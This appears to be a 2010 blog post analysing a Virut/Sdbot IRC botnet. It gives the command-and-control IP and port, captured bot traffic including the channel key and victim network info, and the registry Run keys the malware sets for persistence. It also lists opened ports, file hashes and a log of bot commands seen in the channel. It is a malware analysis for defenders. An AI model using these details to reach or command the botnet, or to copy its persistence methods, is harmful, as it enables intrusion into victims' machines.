75.73.242.77

By Pig, February 11, 2010

Remote Host Port Number
75.73.242.77 6667

NICK USA|00|XP|SP2|4431695
USER ftjjnps 0 0 :USA|00|XP|SP2|4431695
USERHOST USA|00|XP|SP2|4431695
MODE USA|00|XP|SP2|4431695 -x+i
JOIN ###chaosbot### chaosisfullalulz
PRIVMSG ###chaosbot### :[NETINFO]: [Type]: LAN (LAN Connection). [IP Address]: 192.168.194.128. [Hostname]: 174.133.89.72.
JOIN ###dd0s### (null)
PRIVMSG ###chaosbot### :
(patcher.p
fixed, version 1.
PONG :CE21787E

There was an outbound traffic produced on port 6667:
00000000 | 5041 5254 2023 2323 6368 616F 7362 6F74 | PART ###chaosbot
00000010 | 2323 230D 0A | ###..

* The following ports were open in the system:

Port Protocol Process
69 UDP mstwain21.exe (%System%mstwain21.exe)
1055 TCP mstwain21.exe (%System%mstwain21.exe)
1432 TCP mstwain21.exe (%System%mstwain21.exe)
1433 TCP mstwain21.exe (%System%mstwain21.exe)
1434 TCP mstwain21.exe (%System%mstwain21.exe)
1435 TCP mstwain21.exe (%System%mstwain21.exe)
1436 TCP mstwain21.exe (%System%mstwain21.exe)
1437 TCP mstwain21.exe (%System%mstwain21.exe)
1438 TCP mstwain21.exe (%System%mstwain21.exe)
1439 TCP mstwain21.exe (%System%mstwain21.exe)
1440 TCP mstwain21.exe (%System%mstwain21.exe)
1441 TCP mstwain21.exe (%System%mstwain21.exe)
1442 TCP mstwain21.exe (%System%mstwain21.exe)
1443 TCP mstwain21.exe (%System%mstwain21.exe)
1444 TCP mstwain21.exe (%System%mstwain21.exe)
1445 TCP mstwain21.exe (%System%mstwain21.exe)
1446 TCP mstwain21.exe (%System%mstwain21.exe)
1447 TCP mstwain21.exe (%System%mstwain21.exe)
1448 TCP mstwain21.exe (%System%mstwain21.exe)
1449 TCP mstwain21.exe (%System%mstwain21.exe)
1450 TCP mstwain21.exe (%System%mstwain21.exe)
1451 TCP mstwain21.exe (%System%mstwain21.exe)
1452 TCP mstwain21.exe (%System%mstwain21.exe)
1453 TCP mstwain21.exe (%System%mstwain21.exe)
1454 TCP mstwain21.exe (%System%mstwain21.exe)
1455 TCP mstwain21.exe (%System%mstwain21.exe)
1456 TCP mstwain21.exe (%System%mstwain21.exe)
1457 TCP mstwain21.exe (%System%mstwain21.exe)
1458 TCP mstwain21.exe (%System%mstwain21.exe)
1459 TCP mstwain21.exe (%System%mstwain21.exe)
1460 TCP mstwain21.exe (%System%mstwain21.exe)
1461 TCP mstwain21.exe (%System%mstwain21.exe)
1462 TCP mstwain21.exe (%System%mstwain21.exe)
1463 TCP mstwain21.exe (%System%mstwain21.exe)
1464 TCP mstwain21.exe (%System%mstwain21.exe)
1465 TCP mstwain21.exe (%System%mstwain21.exe)
1466 TCP mstwain21.exe (%System%mstwain21.exe)
1467 TCP mstwain21.exe (%System%mstwain21.exe)
1468 TCP mstwain21.exe (%System%mstwain21.exe)
1469 TCP mstwain21.exe (%System%mstwain21.exe)
1470 TCP mstwain21.exe (%System%mstwain21.exe)
1471 TCP mstwain21.exe (%System%mstwain21.exe)
1472 TCP mstwain21.exe (%System%mstwain21.exe)
1473 TCP mstwain21.exe (%System%mstwain21.exe)
1474 TCP mstwain21.exe (%System%mstwain21.exe)
1475 TCP mstwain21.exe (%System%mstwain21.exe)
1476 TCP mstwain21.exe (%System%mstwain21.exe)
1477 TCP mstwain21.exe (%System%mstwain21.exe)
1478 TCP mstwain21.exe (%System%mstwain21.exe)
1479 TCP mstwain21.exe (%System%mstwain21.exe)
1480 TCP mstwain21.exe (%System%mstwain21.exe)
1481 TCP mstwain21.exe (%System%mstwain21.exe)
1482 TCP mstwain21.exe (%System%mstwain21.exe)
1483 TCP mstwain21.exe (%System%mstwain21.exe)
1484 TCP mstwain21.exe (%System%mstwain21.exe)
1485 TCP mstwain21.exe (%System%mstwain21.exe)
1486 TCP mstwain21.exe (%System%mstwain21.exe)
1487 TCP mstwain21.exe (%System%mstwain21.exe)
1488 TCP mstwain21.exe (%System%mstwain21.exe)
1489 TCP mstwain21.exe (%System%mstwain21.exe)
1490 TCP mstwain21.exe (%System%mstwain21.exe)
1491 TCP mstwain21.exe (%System%mstwain21.exe)
1492 TCP mstwain21.exe (%System%mstwain21.exe)
1493 TCP mstwain21.exe (%System%mstwain21.exe)
1494 TCP mstwain21.exe (%System%mstwain21.exe)
1495 TCP mstwain21.exe (%System%mstwain21.exe)
1496 TCP mstwain21.exe (%System%mstwain21.exe)
1497 TCP mstwain21.exe (%System%mstwain21.exe)
1498 TCP mstwain21.exe (%System%mstwain21.exe)
1499 TCP mstwain21.exe (%System%mstwain21.exe)
1500 TCP mstwain21.exe (%System%mstwain21.exe)
1501 TCP mstwain21.exe (%System%mstwain21.exe)
1502 TCP mstwain21.exe (%System%mstwain21.exe)
1503 TCP mstwain21.exe (%System%mstwain21.exe)
1504 TCP mstwain21.exe (%System%mstwain21.exe)
1505 TCP mstwain21.exe (%System%mstwain21.exe)
1506 TCP mstwain21.exe (%System%mstwain21.exe)
1507 TCP mstwain21.exe (%System%mstwain21.exe)
1508 TCP mstwain21.exe (%System%mstwain21.exe)
1509 TCP mstwain21.exe (%System%mstwain21.exe)
1510 TCP mstwain21.exe (%System%mstwain21.exe)
1511 TCP mstwain21.exe (%System%mstwain21.exe)
1512 TCP mstwain21.exe (%System%mstwain21.exe)
1513 TCP mstwain21.exe (%System%mstwain21.exe)
1514 TCP mstwain21.exe (%System%mstwain21.exe)
1515 TCP mstwain21.exe (%System%mstwain21.exe)
1516 TCP mstwain21.exe (%System%mstwain21.exe)
1517 TCP mstwain21.exe (%System%mstwain21.exe)
1518 TCP mstwain21.exe (%System%mstwain21.exe)
1519 TCP mstwain21.exe (%System%mstwain21.exe)
1520 TCP mstwain21.exe (%System%mstwain21.exe)
1521 TCP mstwain21.exe (%System%mstwain21.exe)
1522 TCP mstwain21.exe (%System%mstwain21.exe)
1523 TCP mstwain21.exe (%System%mstwain21.exe)
1524 TCP mstwain21.exe (%System%mstwain21.exe)
1525 TCP mstwain21.exe (%System%mstwain21.exe)
1526 TCP mstwain21.exe (%System%mstwain21.exe)
1527 TCP mstwain21.exe (%System%mstwain21.exe)
1528 TCP mstwain21.exe (%System%mstwain21.exe)
1529 TCP mstwain21.exe (%System%mstwain21.exe)

Registry Modifications

* The following Registry Keys were created:
o HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunServices
o HKEY_CURRENT_USERSoftwareMicrosoftOLE

* The newly created Registry Values are:
o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftOle]
+ EnableRemoteConnect = “N”
o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
+ Nod32 Service = “mstwain21.exe”

so that mstwain21.exe runs every time Windows starts
o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunServices]
+ Nod32 Service = “mstwain21.exe”

so that mstwain21.exe runs every time Windows starts
o [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet Settings]
+ MaxConnectionsPer1_0Server = 0x00000050
+ ForwardBufferMemory = 0x00019DF7
+ MaxConnectionsPerServer = 0x00000050
o [HKEY_CURRENT_USERSoftwareMicrosoftOLE]
+ Nod32 Service = “mstwain21.exe”

* The following Registry Values were modified:
o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftOle]
+ EnableDCOM =
o [HKEY_LOCAL_MACHINESYSTEMControlSet001ControlLsa]
+ restrictanonymous =
o [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa]
+ restrictanonymous =

Memory Modifications

* There was a new process created in the system:

Process Name Process Filename Main Module Size
mstwain21.exe %System%mstwain21.exe 1 232 896 bytes

File System Modifications

* The following file was created in the system:

# Filename(s) File Size File Hash Alias
1 %System%mstwain21.exe
[file and pathname of the sample #1] 1 204 224 bytes MD5: 0x4A08C311A84635CF5A8C1CBC625ABDCA
SHA-1: 0x3D80A6BA5C383F1AEE7571B7787DF14C796A4F5B Win32.Virut.Gen.4 [PCTools]
W32.Randex.gen [Symantec]
Virus.Win32.Virut.av [Kaspersky Lab]
W32/Sdbot.worm.gen.g [McAfee]
PE_VIRUT.AV [Trend Micro]
W32/Virut-W [Sophos]
Virus:Win32/Virut.AC [Microsoft]
Win32/Virut.B [AhnLab]

Now talking in ###chaosbot###
Topic On: [ ###chaosbot### ] [ .root.mass -s ]
Topic By: [ ChanServ ]
Query with Bender
Waiting for acknowledgement…
(Bender) USA|00|XP|SP2|4431695 .com.ni
Modes On: [###chaosbot### ] [ +sntuk chaosisfullalulz ]
(user!notice) from Bende .com.kpn Windows23.exe -s
(user!notice)- from Bender .com.kpn svchost32.exe -s
.r0x kaosb0t -s

Invisible Users: 158
Operators: 9 operator(s) online
Channels: 6 channels formed
Clients: I have 157 clients and 1 servers
Local users: Current Local Users: 157 Max: 479
Global users: Current Global Users: 165 Max: 382

Categories: Uncategorized
Previous post
Next post